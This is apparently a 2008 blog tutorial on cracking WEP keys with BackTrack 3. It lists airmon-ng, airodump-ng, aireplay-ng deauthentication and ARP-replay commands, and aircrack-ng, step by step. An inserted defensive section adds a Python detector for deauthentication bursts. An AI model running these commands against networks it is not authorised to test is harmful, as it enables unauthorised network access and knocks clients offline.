Cracking WEP using BackTrack 3
Saturday, September 06th, 2008 | Author: Kow
I suppose there's probably a slew of other documents detailing…or summarizing…how to crack a WEP key with BackTrack. That's fine. I'll probably link to some later.
I'm assuming whoever is reading this already knows about Atheros devices. I'm assuming a lot of other things too, and I'm not one to write the primer; there is plenty of Linux help out there on Google.
Concepts
- Create monitoring interface.
- Select a target.
- Capture an ARP request for a replay attack.
- Attack the client: force a deauthentication so it re-sends ARP, then replay.
- Crack it.
Step Through Summary
- Created the monitoring interface using the command airmon-ng start wifi0. This created an interface ath1, which I then used for the rest of the process.
- Using airodump I located an Access Point and chose an associated client as the target: airodump-ng ath1. Found an AP/client pair on channel 1 and decided to pursue it using the command airodump-ng -w target1_datetime -c 1 --ivs ath1. (The --ivs switch is used for cracking…I recommend reading the manpages [airodump-ng, ivstools, makeivs]; a dump file prefix (-w) is required when using --ivs.)
- Grabbing the AP/client MAC mapping, I'm going to try to capture IVs: aireplay-ng -3 -b {APMAC} -h {CLIENTMAC} ath1. Stepping into it…
- I want to deauth the target to capture an ARP request and replay it when I get it: aireplay-ng -0 2 -a {APMAC} -c {CLIENTMAC} ath1. (Research the syntax: deauth (-0) sent twice (2). I'd imagine anything much higher and you risk losing the client's heartbeat.)
- I collected IVs over the course of a minute, so I decided to try cracking it: aircrack-ng target1_datetime. Wasn't long enough…so I tried about 5 minutes. Cracked the key.
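From the defender's side, the deauth step above is the noisiest part of the whole sequence and is easy to spot in a monitor-mode capture. The following is an added example, not part of the original post: a small detector that flags an AP-to-client pair sending a burst of deauthentication frames inside a short window. The frame records and MAC addresses are constructed sample data standing in for fields parsed out of a real capture.

```python
"""Flag deauthentication bursts in a list of 802.11 management/data frames.
Input records are (timestamp_seconds, subtype, src_mac, dst_mac) tuples; in
practice these fields would be pulled from a pcap taken in monitor mode."""
from collections import defaultdict, deque

# Constructed sample capture: one legitimate deauth from the AP at t=1.0,
# then a burst of deauths "from" the AP to a single client at t=10.0..10.6.
SAMPLE_FRAMES = [
    (0.0, "beacon", "02:aa:bb:cc:dd:01", "ff:ff:ff:ff:ff:ff"),
    (1.0, "deauth", "02:aa:bb:cc:dd:01", "02:11:22:33:44:02"),
    (2.0, "data", "02:11:22:33:44:02", "02:aa:bb:cc:dd:01"),
    (10.0, "deauth", "02:aa:bb:cc:dd:01", "02:11:22:33:44:02"),
    (10.2, "deauth", "02:aa:bb:cc:dd:01", "02:11:22:33:44:02"),
    (10.4, "deauth", "02:aa:bb:cc:dd:01", "02:11:22:33:44:02"),
    (10.6, "deauth", "02:aa:bb:cc:dd:01", "02:11:22:33:44:02"),
    (11.0, "data", "02:11:22:33:44:02", "02:aa:bb:cc:dd:01"),
]


def deauth_bursts(frames, window=2.0, threshold=3):
    """Return {(src, dst): peak_count} for every src->dst pair that sends at
    least `threshold` deauth frames within any `window`-second span.
    A lone deauth is normal housekeeping; several aimed at one client in a
    couple of seconds is the signature of a forced reconnect."""
    recent = defaultdict(deque)  # (src, dst) -> deauth timestamps in window
    peaks = {}
    for ts, subtype, src, dst in sorted(frames):
        if subtype != "deauth":
            continue
        q = recent[(src, dst)]
        q.append(ts)
        while q and ts - q[0] > window:  # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold:
            peaks[(src, dst)] = max(peaks.get((src, dst), 0), len(q))
    return peaks


if __name__ == "__main__":
    for (src, dst), n in deauth_bursts(SAMPLE_FRAMES).items():
        print(f"deauth burst: {src} -> {dst}, {n} frames within window")
```

Thresholds are an assumption; tune `window` and `threshold` against a baseline of your own APs, since some controllers legitimately deauth clients during roaming.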
I recommend more reading on PCAP and the tools used. Also some interesting things could be done with netcat…
Google similar documents: "BackTrack 3 + cracking WEP"
I only used this on my own networks…